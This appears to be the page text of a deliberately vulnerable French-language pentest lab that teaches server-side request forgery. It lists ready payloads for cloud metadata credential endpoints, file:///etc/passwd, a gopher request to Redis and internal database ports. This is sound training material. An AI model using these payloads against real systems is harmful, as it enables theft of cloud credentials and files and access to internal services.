Pentest Lab - Failles de Securite

ATTENTION: Ces pages contiennent des vulnerabilites volontaires pour tests uniquement!

SSRF (Server-Side Request Forgery)

Cette page permet de faire des requetes HTTP depuis le serveur sans validation.

Indices d'exploitation

  • Localhost: http://127.0.0.1 ou http://localhost
  • Metadata cloud: http://169.254.169.254/latest/meta-data/
  • Services internes: http://internal-api:8080
  • File protocol: file:///etc/passwd
  • Gopher: gopher://127.0.0.1:6379/_INFO

Fetch URL

URLs a tester

Target URL Description
Localhost http://127.0.0.1:80 Serveur web local
Loopback IPv6 http://[::1] Contournement de filtre
AWS Metadata http://169.254.169.254/latest/meta-data/ Credentials AWS
GCP Metadata http://metadata.google.internal/ Credentials GCP
File system file:///etc/passwd Lecture de fichiers locaux
Internal service http://localhost:3306 Base de donnees MySQL
Redis http://localhost:6379 Cache Redis

Techniques de bypass